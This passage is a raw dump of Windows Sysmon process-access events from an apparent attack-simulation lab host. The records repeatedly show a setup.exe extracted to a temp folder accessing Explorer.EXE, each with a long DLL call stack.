ow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
